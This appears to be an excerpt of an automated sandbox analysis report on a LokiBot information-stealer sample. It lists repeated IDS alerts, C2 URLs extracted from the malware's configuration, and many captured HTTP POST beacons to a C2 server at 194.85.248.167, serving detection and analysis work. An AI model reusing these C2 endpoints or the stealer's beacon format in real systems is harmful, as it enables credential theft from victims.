              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49827
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49829
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49833
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49845
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49851
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49855
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49856
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49857
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49858
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49859
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49860
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49861
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49862
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49863
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49865
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49866
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49867
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: DATACENTERRO DATACENTERRO
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: U001P56ybm.exe, 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://194.85.248.167/imt/fre.php
              Source: U001P56ybm.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: U001P56ybm.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 190Connection: close
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00404ED4 recv,
